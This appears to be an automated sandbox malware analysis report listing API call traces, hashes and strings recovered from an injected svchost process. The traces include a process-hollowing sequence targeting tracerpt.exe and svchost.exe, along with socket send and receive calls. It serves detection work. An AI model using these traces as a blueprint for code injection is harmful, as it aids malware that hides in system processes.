                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                              • String ID: string too long
                                                                                                              • API String ID: 1823113695-2556327735
                                                                                                              • Opcode ID: 5238ac53f0d02015aea289703f10727c8d0579bc430fcfcbac986e0088ba278c
                                                                                                              • Instruction ID: 0db52dc7400e83bd8d53fba3271c010e2ab2736e560c5e346b655907f3121344
                                                                                                              • Opcode Fuzzy Hash: 5238ac53f0d02015aea289703f10727c8d0579bc430fcfcbac986e0088ba278c
                                                                                                              • Instruction Fuzzy Hash: 04E01270B515219F8B39EE348C94C2E6296AF45B113134EA9F666CF1B0DB20E80457A6
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 04C7022B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                              • Instruction ID: 6be781a4ac1f03d685ce1836c9419e3a4ca901c9a763a2376e6d126f9a319886
                                                                                                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                              • Instruction Fuzzy Hash: D3A15B71A00606EFDB14CFAAC880AAEB7B6FF48305F148169E515EB751E770FA51CB90
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Time_memmovetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1463837790-0
                                                                                                              • Opcode ID: 694669d04593f539c9e75b845fed7f34f74247e0099f0f7e302f339ba4c77220
                                                                                                              • Instruction ID: 3c3145a7c1b67174d549d1469f88985c562f4a893094c1004e48b45b7c7e4a4a
                                                                                                              • Opcode Fuzzy Hash: 694669d04593f539c9e75b845fed7f34f74247e0099f0f7e302f339ba4c77220
                                                                                                              • Instruction Fuzzy Hash: 19517E727002069FDB25DFA9CCC0A6AB7A5FF84214717866DEE198B705EB31FC518B90
                                                                                                              APIs
                                                                                                              • std::exception::exception.LIBCMT ref: 04DF864E
                                                                                                                • Part of subcall function 04DFF5D6: std::exception::_Copy_str.LIBCMT ref: 04DFF5F1
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 04DF8663
                                                                                                                • Part of subcall function 04E01265: RaiseException.KERNEL32(?,?,04DFF7D6,?,?,?,?,?,04DFF7D6,?,04E17698,04E1FBA0,?,?,04DFE064,00000068), ref: 04E012A7
                                                                                                                • Part of subcall function 04DF8720: std::exception::exception.LIBCMT ref: 04DF8752
                                                                                                                • Part of subcall function 04DF8720: __CxxThrowException@8.LIBCMT ref: 04DF8767
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_
                                                                                                              • String ID:
                                                                                                              • API String ID: 1430062303-0
                                                                                                              • Opcode ID: 74368a099db5212b95c625d94b5a001ba37be2f1bc51ef0384b7d0daec4c11a7
                                                                                                              • Instruction ID: 1ed85aff6a4fde40b436bd0882a25392cf0810842207017925b59b253df033d8
                                                                                                              • Opcode Fuzzy Hash: 74368a099db5212b95c625d94b5a001ba37be2f1bc51ef0384b7d0daec4c11a7
                                                                                                              • Instruction Fuzzy Hash: F541B6B1A00205DBDB24EF68CC446AEB7F5FF44714F154A2EE92697780E734B910DBA2
                                                                                                              APIs
                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02583013
                                                                                                              • recv.WS2_32(?,?,00040000,00000000), ref: 02583034
                                                                                                                • Part of subcall function 025871ED: __getptd_noexit.LIBCMT ref: 025871ED
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexitrecvselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 4248608111-0
                                                                                                              • Opcode ID: 64e1ba8f9df031f4d4c43ff39b76b84292b7e5f4a98d33d9083d18581a2f0473
                                                                                                              • Instruction ID: e516a96ccfbc0552d5bc7ccef900ebd482a040af75d73eddc11637c61510f2b8
                                                                                                              • Opcode Fuzzy Hash: 64e1ba8f9df031f4d4c43ff39b76b84292b7e5f4a98d33d9083d18581a2f0473
                                                                                                              • Instruction Fuzzy Hash: 67219671D00208EBDB20BF64CC88BAA77A5FF45714F1005E5E9447B194D7F0A984CF69
                                                                                                              APIs
                                                                                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04DF3043
                                                                                                              • recv.WS2_32(?,?,00040000,00000000), ref: 04DF3064
                                                                                                                • Part of subcall function 04DFF96B: __getptd_noexit.LIBCMT ref: 04DFF96B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexitrecvselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 4248608111-0
                                                                                                              • Opcode ID: e4dbafae5dc407c68e03ef3992c6ba13a5ec1112f2be93e5df91c6f972062619
                                                                                                              • Instruction ID: e7dc4cb57753af9807a3d4371214e09462d71a6d25764538ba5d45bb9cb1d8a5
                                                                                                              • Opcode Fuzzy Hash: e4dbafae5dc407c68e03ef3992c6ba13a5ec1112f2be93e5df91c6f972062619
                                                                                                              • Instruction Fuzzy Hash: FD21A5707002089BEB30EF69CC84B9A73A4FF05314F1645A6EF14AB290D670BD84CBA1
                                                                                                              APIs
                                                                                                              • send.WS2_32(?,?,00040000,00000000), ref: 02583261
                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 0258329E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: send
                                                                                                              • String ID:
                                                                                                              • API String ID: 2809346765-0
                                                                                                              • Opcode ID: e69bd955157d818937de600f45d0dd7f382629ac16679c39a62ebfd32effffa7
                                                                                                              • Instruction ID: 003a4fde728e72538886fc5359b1191368494b9c35ee6bcb48843df0a39ea2ab
                                                                                                              • Opcode Fuzzy Hash: e69bd955157d818937de600f45d0dd7f382629ac16679c39a62ebfd32effffa7
                                                                                                              • Instruction Fuzzy Hash: 3F112972B01204B7D710DA29DC84B4E7B59FB81724F1001B1E90EF7140D3B0D945965A
                                                                                                              APIs
                                                                                                              • send.WS2_32(?,?,00040000,00000000), ref: 04DF3291
                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 04DF32CE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: send
                                                                                                              • String ID:
                                                                                                              • API String ID: 2809346765-0
                                                                                                              • Opcode ID: 17a846623e2814aae8611190eb2227084808a8205c4b752c15c7ac1e9ce49607
                                                                                                              • Instruction ID: 7d1e5b390589db9c95cf6a261dce9c6f9aabd0c25e42b5c9c93c54f8f13ce35e
                                                                                                              • Opcode Fuzzy Hash: 17a846623e2814aae8611190eb2227084808a8205c4b752c15c7ac1e9ce49607
                                                                                                              • Instruction Fuzzy Hash: 77118272B05204BBD7708AAEDC85B5E7798FB81364F134126EF18D7290D670FD419664
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: SleepTimetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 346578373-0
                                                                                                              • Opcode ID: 9b4722b624e0aeb5785c219210b56b25ff3a11f242d146242766cdbd1158138f
                                                                                                              • Instruction ID: 04cb6d97dad0df52390441daf18c8dc7ae0c9fc3e99fca620176b8095868015a
                                                                                                              • Opcode Fuzzy Hash: 9b4722b624e0aeb5785c219210b56b25ff3a11f242d146242766cdbd1158138f
                                                                                                              • Instruction Fuzzy Hash: 2501D43160020ABFD311EF28C8C8BBDB7B5FB95704F144264D1049B280C7B0A9D5D7E5
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: SleepTimetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 346578373-0
                                                                                                              • Opcode ID: 61225528bd8b83cb80128722c838224b9b2978aabea083ae74d6e851398a9126
                                                                                                              • Instruction ID: 0cb47901ca0a85aa2bfa530e8710616b2810e0f3015987c6a36065b3be4c6628
                                                                                                              • Opcode Fuzzy Hash: 61225528bd8b83cb80128722c838224b9b2978aabea083ae74d6e851398a9126
                                                                                                              • Instruction Fuzzy Hash: E101F231200206AFD720CF69CCC8B69B7F5FB9A301F164224DA048B294C735BAC6C7E1
                                                                                                              APIs
                                                                                                              • HeapCreate.KERNELBASE(00000004,00000000,00000000,02586190,00000000,02585AF2), ref: 025864FB
                                                                                                              • _free.LIBCMT ref: 02586536
                                                                                                                • Part of subcall function 02581280: __CxxThrowException@8.LIBCMT ref: 02581290
                                                                                                                • Part of subcall function 02581280: DeleteCriticalSection.KERNEL32(00000000,FFFFFFFF,02597DF8,?,?,02586511), ref: 025812A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1116298128-0
                                                                                                              • Opcode ID: 4c416871c5f17d461c265f441a6c37e026a646eadac0d9651c3fe77f7bd077b8
                                                                                                              • Instruction ID: 5ef352f5398e0c6afbe7fd08f1e2d7eb76ad39d5bf4894f0b23242164d7bacc0
                                                                                                              • Opcode Fuzzy Hash: 4c416871c5f17d461c265f441a6c37e026a646eadac0d9651c3fe77f7bd077b8
                                                                                                              • Instruction Fuzzy Hash: F2017EF0A00B408FC3309F6AD844A17FAE9FF98710B504A1ED2DAD7A10D7B0A545CF59
                                                                                                              APIs
                                                                                                              • HeapCreate.KERNELBASE(00000004,00000000,00000000,04DFE09E,00000000,04DF9850,?,?,?,00000000,04E122BB,000000FF,?,04DFE09E), ref: 04DFCD6B
                                                                                                              • _free.LIBCMT ref: 04DFCDA6
                                                                                                                • Part of subcall function 04DF1280: __CxxThrowException@8.LIBCMT ref: 04DF1290
                                                                                                                • Part of subcall function 04DF1280: DeleteCriticalSection.KERNEL32(00000000,04DFD436,04E17644,?,?,04DFD436,?,?,?,?,04E161F4,00000000), ref: 04DF12A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1116298128-0
                                                                                                              • Opcode ID: a110f60fac92c5a6fc372aef022e3e77dc3a9d48f12fd31d9bc311615d64f809
                                                                                                              • Instruction ID: fd007dfe6b3c7768cbdf5ffe098cb749f60c39e91a7af05d9bdc5363e3fed450
                                                                                                              • Opcode Fuzzy Hash: a110f60fac92c5a6fc372aef022e3e77dc3a9d48f12fd31d9bc311615d64f809
                                                                                                              • Instruction Fuzzy Hash: B8017EF0A00B448FD7309F6A9844A07FAF8FF98711B118A1ED6DAC6A20D374A405CB95
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04DFDF60,00000000,00000000,00000000), ref: 04DFE4EB
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04E011B8,?,?,?,?,?,?,04E172B8,0000000C,04E01260,?), ref: 04DFE4F9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateObjectSingleThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 1891408510-0
                                                                                                              • Opcode ID: 97d26294671fb86be8a7ba3450c0d88511e54c046371e9d340fa47980968facd
                                                                                                              • Instruction ID: 778475d0604b59e97b3d606ec58f137a58f27879bbca1687cff040247ffd30c8
                                                                                                              • Opcode Fuzzy Hash: 97d26294671fb86be8a7ba3450c0d88511e54c046371e9d340fa47980968facd
                                                                                                              • Instruction Fuzzy Hash: B4E05BB1544245BFEF309F55BC44D36B7DCE7047127104239BE20D32A8D539FD809A60
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 02587261
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                                • Part of subcall function 02587236: __getptd_noexit.LIBCMT ref: 0258723B
                                                                                                                • Part of subcall function 02587236: __freeptd.LIBCMT ref: 02587245
                                                                                                                • Part of subcall function 02587236: ExitThread.KERNEL32 ref: 0258724E
                                                                                                              • __XcptFilter.LIBCMT ref: 02587282
                                                                                                                • Part of subcall function 02589CAD: __getptd_noexit.LIBCMT ref: 02589CB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                              • String ID:
                                                                                                              • API String ID: 418257734-0
                                                                                                              • Opcode ID: 0ea0c1c98fede5f0e375875cc1fc104bae23627d61ea555b37a360c674d81b9e
                                                                                                              • Instruction ID: 4c72d88306809e1276a88290ab68af2be203823da636619fb4a5c8a9621e1c9e
                                                                                                              • Opcode Fuzzy Hash: 0ea0c1c98fede5f0e375875cc1fc104bae23627d61ea555b37a360c674d81b9e
                                                                                                              • Instruction Fuzzy Hash: 48E0E6B5910605AFE718BBA0C945E7DB766FF88301F200049E103673A1DBB59941DF19
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 04DFF9DF
                                                                                                                • Part of subcall function 04E03EAB: __getptd_noexit.LIBCMT ref: 04E03EAE
                                                                                                                • Part of subcall function 04E03EAB: __amsg_exit.LIBCMT ref: 04E03EBB
                                                                                                                • Part of subcall function 04DFF9B4: __getptd_noexit.LIBCMT ref: 04DFF9B9
                                                                                                                • Part of subcall function 04DFF9B4: __freeptd.LIBCMT ref: 04DFF9C3
                                                                                                                • Part of subcall function 04DFF9B4: ExitThread.KERNEL32 ref: 04DFF9CC
                                                                                                              • __XcptFilter.LIBCMT ref: 04DFFA00
                                                                                                                • Part of subcall function 04E041DD: __getptd_noexit.LIBCMT ref: 04E041E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                              • String ID:
                                                                                                              • API String ID: 418257734-0
                                                                                                              • Opcode ID: 52cf22b48670fbfcdee9c102af8bc388ac8017b73a5246b6d0237965a53dab2d
                                                                                                              • Instruction ID: 746a562ac93556499ddb0e982e2b5f7f1162049f3c056b19eb1447b7a7392578
                                                                                                              • Opcode Fuzzy Hash: 52cf22b48670fbfcdee9c102af8bc388ac8017b73a5246b6d0237965a53dab2d
                                                                                                              • Instruction Fuzzy Hash: 99E08CB1940600AFFB18FBA0C904E7D3734EF44208F205148E2115B2E0CA75B980EE20
                                                                                                              APIs
                                                                                                              • __lock.LIBCMT ref: 04E0646B
                                                                                                                • Part of subcall function 04E08EAB: __mtinitlocknum.LIBCMT ref: 04E08EC1
                                                                                                                • Part of subcall function 04E08EAB: __amsg_exit.LIBCMT ref: 04E08ECD
                                                                                                                • Part of subcall function 04E08EAB: EnterCriticalSection.KERNEL32(00000000,00000000,?,04E03F56,0000000D,04E17360,00000008,04E0404D,00000000,?,04E01140,00000000,04E17298,00000008,04E011A5,?), ref: 04E08ED5
                                                                                                              • __tzset_nolock.LIBCMT ref: 04E0647C
                                                                                                                • Part of subcall function 04E05D72: __lock.LIBCMT ref: 04E05D94
                                                                                                                • Part of subcall function 04E05D72: ____lc_codepage_func.LIBCMT ref: 04E05DDB
                                                                                                                • Part of subcall function 04E05D72: __getenv_helper_nolock.LIBCMT ref: 04E05DFD
                                                                                                                • Part of subcall function 04E05D72: _free.LIBCMT ref: 04E05E34
                                                                                                                • Part of subcall function 04E05D72: _strlen.LIBCMT ref: 04E05E3B
                                                                                                                • Part of subcall function 04E05D72: __malloc_crt.LIBCMT ref: 04E05E42
                                                                                                                • Part of subcall function 04E05D72: _strlen.LIBCMT ref: 04E05E58
                                                                                                                • Part of subcall function 04E05D72: _strcpy_s.LIBCMT ref: 04E05E66
                                                                                                                • Part of subcall function 04E05D72: __invoke_watson.LIBCMT ref: 04E05E7B
                                                                                                                • Part of subcall function 04E05D72: _free.LIBCMT ref: 04E05E8A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 1828324828-0
                                                                                                              • Opcode ID: 2f382f1935b3b1d8cbb45089e2215bdb8e87dcfb3d36db19ac006c04ee7de1eb
                                                                                                              • Instruction ID: 719f9d80081964adf45c2ffbbe4cb8ac15d4c410309b6dd518c7281e035a6467
                                                                                                              • Opcode Fuzzy Hash: 2f382f1935b3b1d8cbb45089e2215bdb8e87dcfb3d36db19ac006c04ee7de1eb
                                                                                                              • Instruction Fuzzy Hash: A4E08CB1481710A7E732BBF0670061C7220BB90B2AF10F11AD23025CC8CA393AC2CA61
                                                                                                              APIs
                                                                                                              • RegCloseKey.ADVAPI32(80000001,04DF6EEA), ref: 04DF6F19
                                                                                                              • RegCloseKey.ADVAPI32(75A773E0), ref: 04DF6F22
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,04E0459A,00000000,00000001,00000000,00000000,00000000,?,04E03E5D,00000001,00000214,?,04E04550), ref: 04E0A785
                                                                                                                • Part of subcall function 04DFF96B: __getptd_noexit.LIBCMT ref: 04DFF96B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 328603210-0
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 02585849
                                                                                                              • _memset.LIBCMT ref: 02585868
                                                                                                              • _memset.LIBCMT ref: 0258589D
                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 025858B1
                                                                                                                • Part of subcall function 025859E0: _vswprintf_s.LIBCMT ref: 025859F1
                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 025858E0
                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02585928
                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,75920630), ref: 0258594E
                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,75920630), ref: 02585968
                                                                                                              • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,75920630), ref: 02585987
                                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,75920630), ref: 025859A2
                                                                                                              • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,75920630), ref: 025859C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                              • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                              • API String ID: 2170139861-1986163084
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF7EC3
                                                                                                              • _memset.LIBCMT ref: 04DF7EEF
                                                                                                              • _memset.LIBCMT ref: 04DF7F24
                                                                                                              • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 04DF7F38
                                                                                                                • Part of subcall function 04DF8770: _vswprintf_s.LIBCMT ref: 04DF8781
                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 04DF7F65
                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04DF7FB5
                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 04DF7FE2
                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 04DF7FFA
                                                                                                              • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 04DF801C
                                                                                                              • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 04DF803A
                                                                                                              • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 04DF804F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                              • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                              • API String ID: 2170139861-2473635271
                                                                                                              APIs
                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,04E20D80,7591E010,75922FA0,75920F00,?,04DF6078,?,?), ref: 04DFE569
                                                                                                              • lstrcatW.KERNEL32(04E20D80,\DisplaySessionContainers.log,?,04DF6078,?,?), ref: 04DFE579
                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,04E20D80,?,04DF6078,?,?), ref: 04DFE588
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04DF6078,?,?), ref: 04DFE596
                                                                                                              • CreateFileW.KERNEL32(04E20D80,40000000,00000002,00000000,00000004,00000080,00000000,?,04DF6078,?,?), ref: 04DFE5B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,04DF6078,?,?), ref: 04DFE5BE
                                                                                                              • CloseHandle.KERNEL32(00000000,?,04DF6078,?,?), ref: 04DFE5C7
                                                                                                              • DeleteFileW.KERNEL32(04E20D80,?,04DF6078,?,?), ref: 04DFE5DA
                                                                                                              • ReleaseMutex.KERNEL32(?,?,04DF6078,?,?), ref: 04DFE5E7
